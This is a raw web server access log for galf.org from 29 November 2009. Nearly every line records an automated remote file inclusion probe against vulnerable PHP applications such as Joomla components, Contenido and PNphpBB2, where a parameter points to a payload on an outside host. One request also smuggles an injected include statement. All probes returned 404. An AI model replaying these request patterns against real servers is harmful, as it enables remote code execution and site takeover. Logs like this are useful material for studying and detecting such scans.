77.221.130.13 - - [29/Nov/2009:16:31:20 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://ioct.cbnu.ac.kr//bbs/skin/zero_vote/10.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
77.221.130.13 - - [29/Nov/2009:16:31:20 -0800] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://ioct.cbnu.ac.kr//bbs/skin/zero_vote/10.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
77.221.130.13 - - [29/Nov/2009:16:31:20 -0800] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://ioct.cbnu.ac.kr//bbs/skin/zero_vote/10.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
202.30.48.8 - - [29/Nov/2009:16:31:36 -0800] "GET /logs/access_090622.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.prestigemarketinggroup.net/mambots/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.13 - - [29/Nov/2009:16:31:40 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://ioct.cbnu.ac.kr//bbs/skin/zero_vote/10.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.13 - - [29/Nov/2009:16:31:40 -0800] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://ioct.cbnu.ac.kr//bbs/skin/zero_vote/10.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.13 - - [29/Nov/2009:16:31:40 -0800] "GET /logs/access_090601.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://ioct.cbnu.ac.kr//bbs/skin/zero_vote/10.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.127.209.27 - - [29/Nov/2009:16:32:46 -0800] "GET /logs/access_090511.log/include/lib.inc.php?site_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.127.209.27 - - [29/Nov/2009:16:32:46 -0800] "GET /logs/include/lib.inc.php?site_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.127.209.27 - - [29/Nov/2009:16:32:46 -0800] "GET /include/lib.inc.php?site_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.217.76.244 - - [29/Nov/2009:16:33:36 -0800] "GET /logs/access.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://chandra35.fileave.com/bobrok1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
209.217.76.244 - - [29/Nov/2009:16:34:07 -0800] "GET /logs/access_090601.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://chandra35.fileave.com/bobrok1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.13 - - [29/Nov/2009:16:35:19 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://ioct.cbnu.ac.kr//bbs/skin/zero_vote/10.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.13 - - [29/Nov/2009:16:35:19 -0800] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://ioct.cbnu.ac.kr//bbs/skin/zero_vote/10.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.13 - - [29/Nov/2009:16:35:19 -0800] "GET /logs/access_090608.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://ioct.cbnu.ac.kr//bbs/skin/zero_vote/10.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.30.48.8 - - [29/Nov/2009:16:35:23 -0800] "GET /logs/access_090504.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.prestigemarketinggroup.net/mambots/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.30.48.8 - - [29/Nov/2009:16:35:42 -0800] "GET /logs/access_090525.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.prestigemarketinggroup.net/mambots/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.30.48.8 - - [29/Nov/2009:16:35:42 -0800] "GET /logs/access_090504.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.prestigemarketinggroup.net/mambots/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.13 - - [29/Nov/2009:16:35:48 -0800] "GET /logs/access_090511.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://ioct.cbnu.ac.kr//bbs/skin/zero_vote/10.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.72.254.214 - - [29/Nov/2009:16:36:05 -0800] "GET /includes/ktedit/toolbar.php?dirDepth=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.72.254.214 - - [29/Nov/2009:16:36:05 -0800] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.72.254.214 - - [29/Nov/2009:16:36:05 -0800] "GET /logs/access_090525.log/includes/ktedit/toolbar.php?dirDepth=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [29/Nov/2009:16:38:16 -0800] "GET /logs/access_090713.log/includes/ktedit/toolbar.php?dirDepth=http://www.detroitbargainhomes.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.30.48.8 - - [29/Nov/2009:16:46:53 -0800] "GET /logs/access.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.prestigemarketinggroup.net/mambots/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
202.30.48.8 - - [29/Nov/2009:16:46:53 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.prestigemarketinggroup.net/mambots/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
202.30.48.8 - - [29/Nov/2009:16:46:53 -0800] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.prestigemarketinggroup.net/mambots/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
113.34.82.15 - - [29/Nov/2009:16:49:29 -0800] "GET /logs//main.php?sayfa=http://exgamesbrasil.com.br/scan/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
113.34.82.15 - - [29/Nov/2009:16:49:40 -0800] "GET /logs/access_090803.log//main.php?sayfa=http://exgamesbrasil.com.br/scan/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
113.34.82.15 - - [29/Nov/2009:16:49:40 -0800] "GET /logs/access_090608.log//main.php?sayfa=http://exgamesbrasil.com.br/scan/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
209.217.76.244 - - [29/Nov/2009:16:52:24 -0800] "GET /logs/access.log%20%20//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://chandra35.fileave.com/bobrok1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
209.217.76.244 - - [29/Nov/2009:16:52:24 -0800] "GET /index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://chandra35.fileave.com/bobrok1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
209.217.76.244 - - [29/Nov/2009:16:52:24 -0800] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://chandra35.fileave.com/bobrok1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
209.217.76.244 - - [29/Nov/2009:16:52:26 -0800] "GET /logs/access.log%20%20//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://chandra35.fileave.com/bobrok1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
209.217.76.244 - - [29/Nov/2009:16:52:26 -0800] "GET /index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://chandra35.fileave.com/bobrok1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
209.217.76.244 - - [29/Nov/2009:16:52:26 -0800] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://chandra35.fileave.com/bobrok1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
209.217.76.244 - - [29/Nov/2009:16:52:50 -0800] "GET /index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://chandra35.fileave.com/bobrok1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.217.76.244 - - [29/Nov/2009:16:52:50 -0800] "GET /logs/access_090622.log%20%20//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://chandra35.fileave.com/bobrok1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.217.76.244 - - [29/Nov/2009:16:52:50 -0800] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://chandra35.fileave.com/bobrok1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.217.76.244 - - [29/Nov/2009:16:52:55 -0800] "GET /logs/access_090622.log%20%20//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://chandra35.fileave.com/bobrok1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.217.76.244 - - [29/Nov/2009:16:52:55 -0800] "GET /index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://chandra35.fileave.com/bobrok1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.217.76.244 - - [29/Nov/2009:16:52:55 -0800] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://chandra35.fileave.com/bobrok1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.217.76.244 - - [29/Nov/2009:16:55:36 -0800] "GET /logs/access.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://chandra35.fileave.com/bobrok1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
209.217.76.244 - - [29/Nov/2009:16:55:40 -0800] "GET /logs/access.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://chandra35.fileave.com/bobrok1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
209.217.76.244 - - [29/Nov/2009:16:55:56 -0800] "GET /logs/access_090622.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://chandra35.fileave.com/bobrok1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.217.76.244 - - [29/Nov/2009:16:55:58 -0800] "GET /logs/access_090622.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://chandra35.fileave.com/bobrok1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.251.189.205 - - [29/Nov/2009:17:13:18 -0800] "GET /logs/access_091116.log//write.php?dir=http://kmcuria.com/bbs/include/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.251.189.205 - - [29/Nov/2009:17:15:17 -0800] "GET /write.php?dir=http://kmcuria.com/bbs/include/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.251.189.205 - - [29/Nov/2009:17:15:18 -0800] "GET /logs//write.php?dir=http://kmcuria.com/bbs/include/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.251.189.205 - - [29/Nov/2009:17:15:18 -0800] "GET /logs/access_091026.log%20%20//write.php?dir=http://kmcuria.com/bbs/include/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.251.189.205 - - [29/Nov/2009:17:15:37 -0800] "GET /logs/access.log%20%20//write.php?dir=http://kmcuria.com/bbs/include/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
213.251.189.205 - - [29/Nov/2009:17:15:37 -0800] "GET /write.php?dir=http://kmcuria.com/bbs/include/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
213.251.189.205 - - [29/Nov/2009:17:15:37 -0800] "GET /logs//write.php?dir=http://kmcuria.com/bbs/include/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
67.195.115.152 - - [29/Nov/2009:17:24:32 -0800] "GET /labia/?S=A HTTP/1.0" 200 508 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
67.195.115.152 - - [29/Nov/2009:17:25:09 -0800] "GET / HTTP/1.0" 200 1032 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
67.195.115.152 - - [29/Nov/2009:17:26:48 -0800] "GET /labia/?N=A HTTP/1.0" 200 508 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
61.6.163.21 - - [29/Nov/2009:17:33:50 -0800] "GET /logs/access.log HTTP/1.1" 200 37401 "-" "Mozilla/8.0" "www.galf.org"
78.107.65.18 - - [29/Nov/2009:17:34:16 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.107.65.18 - - [29/Nov/2009:17:34:16 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.107.65.18 - - [29/Nov/2009:17:34:16 -0800] "GET /logs/access_090608.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.107.65.18 - - [29/Nov/2009:17:34:23 -0800] "GET /logs/access_090615.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.107.65.18 - - [29/Nov/2009:17:34:23 -0800] "GET /logs/access_090622.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.107.65.18 - - [29/Nov/2009:17:34:24 -0800] "GET /logs/access_090601.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.107.65.18 - - [29/Nov/2009:17:34:25 -0800] "GET /logs/access_090817.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.107.65.18 - - [29/Nov/2009:17:34:32 -0800] "GET /logs/access_090713.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.107.65.18 - - [29/Nov/2009:17:34:33 -0800] "GET /logs/access_090525.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.107.65.18 - - [29/Nov/2009:17:34:37 -0800] "GET /logs/access_091005.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.107.65.18 - - [29/Nov/2009:17:35:46 -0800] "GET /logs/access_090831.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.107.65.18 - - [29/Nov/2009:17:35:53 -0800] "GET /logs/access_091019.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.107.65.18 - - [29/Nov/2009:17:35:54 -0800] "GET /logs/access_090824.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.40.97.102 - - [29/Nov/2009:17:35:55 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.shamrock-maastricht.nl/images/id.jpeg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.40.97.102 - - [29/Nov/2009:17:35:59 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.shamrock-maastricht.nl/images/id.jpeg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.40.97.102 - - [29/Nov/2009:17:35:59 -0800] "GET /logs/access_090706.log%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.shamrock-maastricht.nl/images/id.jpeg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.107.65.18 - - [29/Nov/2009:17:36:12 -0800] "GET /logs/access_090511.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.107.65.18 - - [29/Nov/2009:17:36:13 -0800] "GET /logs/access_090803.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.107.65.18 - - [29/Nov/2009:17:36:53 -0800] "GET /logs/access_090518.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.70.35.48 - - [29/Nov/2009:17:37:14 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.shamrock-maastricht.nl/images/id.jpeg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.70.35.48 - - [29/Nov/2009:17:37:18 -0800] "GET /logs/access_090706.log%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.shamrock-maastricht.nl/images/id.jpeg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.70.35.48 - - [29/Nov/2009:17:37:18 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.shamrock-maastricht.nl/images/id.jpeg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.107.65.18 - - [29/Nov/2009:17:37:41 -0800] "GET /logs/access_090907.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.107.65.18 - - [29/Nov/2009:17:39:31 -0800] "GET /logs/access_090608.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.107.65.18 - - [29/Nov/2009:17:39:31 -0800] "GET /logs/access_090615.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.40.97.102 - - [29/Nov/2009:17:39:46 -0800] "GET /logs/access_090706.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.shamrock-maastricht.nl/images/id.jpeg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.70.35.48 - - [29/Nov/2009:17:40:25 -0800] "GET /logs/access_090706.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.shamrock-maastricht.nl/images/id.jpeg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.115.6.14 - - [29/Nov/2009:17:40:51 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Sosospider+(+http://help.soso.com/webspider.htm)" "www.galf.org"
212.40.97.102 - - [29/Nov/2009:17:42:22 -0800] "GET /joomla/index.php?option=com_restaurante&task=http://www.shamrock-maastricht.nl/images/id.jpeg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.40.97.102 - - [29/Nov/2009:17:42:22 -0800] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.shamrock-maastricht.nl/images/id.jpeg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.40.97.102 - - [29/Nov/2009:17:42:22 -0800] "GET /logs/access_090921.log%20%20/joomla/index.php?option=com_restaurante&task=http://www.shamrock-maastricht.nl/images/id.jpeg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.40.97.102 - - [29/Nov/2009:17:42:23 -0800] "GET /logs/access_090720.log%20%20/joomla/index.php?option=com_restaurante&task=http://www.shamrock-maastricht.nl/images/id.jpeg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.40.97.102 - - [29/Nov/2009:17:43:13 -0800] "GET /logs/access_090921.log/joomla/index.php?option=com_restaurante&task=http://www.shamrock-maastricht.nl/images/id.jpeg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.40.97.102 - - [29/Nov/2009:17:43:13 -0800] "GET /logs/access_090720.log/joomla/index.php?option=com_restaurante&task=http://www.shamrock-maastricht.nl/images/id.jpeg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.107.65.18 - - [29/Nov/2009:17:43:56 -0800] "GET /logs/access_090622.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.40.97.102 - - [29/Nov/2009:17:47:09 -0800] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.shamrock-maastricht.nl/images/id.jpeg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.107.65.18 - - [29/Nov/2009:17:48:14 -0800] "GET /logs/access_090629.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.11 - - [29/Nov/2009:17:48:26 -0800] "GET /logs//bbs/outlogin.php?_zb_path=http://evgs-hohwald.de/pear/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.11 - - [29/Nov/2009:17:48:26 -0800] "GET /logs/access_090608.log//bbs/outlogin.php?_zb_path=http://evgs-hohwald.de/pear/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.11 - - [29/Nov/2009:17:48:26 -0800] "GET /bbs/outlogin.php?_zb_path=http://evgs-hohwald.de/pear/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [29/Nov/2009:17:49:36 -0800] "GET /logs/access.log%20%20/e404.php?DOCUMENT_ROOT=http://aop.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.11.145.8 - - [29/Nov/2009:17:49:36 -0800] "GET /e404.php?DOCUMENT_ROOT=http://aop.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.11.145.8 - - [29/Nov/2009:17:49:36 -0800] "GET /logs/e404.php?DOCUMENT_ROOT=http://aop.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.11.145.8 - - [29/Nov/2009:17:49:43 -0800] "GET /e404.php?DOCUMENT_ROOT=http://aop.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [29/Nov/2009:17:49:43 -0800] "GET /logs/access.log/e404.php?DOCUMENT_ROOT=http://aop.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [29/Nov/2009:17:49:43 -0800] "GET /logs/e404.php?DOCUMENT_ROOT=http://aop.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [29/Nov/2009:17:50:09 -0800] "GET /logs/access_090914.log%20%20/e404.php?DOCUMENT_ROOT=http://aop.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [29/Nov/2009:17:50:09 -0800] "GET /e404.php?DOCUMENT_ROOT=http://aop.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [29/Nov/2009:17:50:09 -0800] "GET /logs/e404.php?DOCUMENT_ROOT=http://aop.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [29/Nov/2009:17:50:11 -0800] "GET /e404.php?DOCUMENT_ROOT=http://aop.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.11.145.8 - - [29/Nov/2009:17:50:11 -0800] "GET /logs/access.log%20%20/e404.php?DOCUMENT_ROOT=http://aop.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.11.145.8 - - [29/Nov/2009:17:50:11 -0800] "GET /logs/e404.php?DOCUMENT_ROOT=http://aop.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
195.70.35.48 - - [29/Nov/2009:17:50:44 -0800] "GET /joomla/index.php?option=com_restaurante&task=http://www.shamrock-maastricht.nl/images/id.jpeg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.70.35.48 - - [29/Nov/2009:17:50:44 -0800] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.shamrock-maastricht.nl/images/id.jpeg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
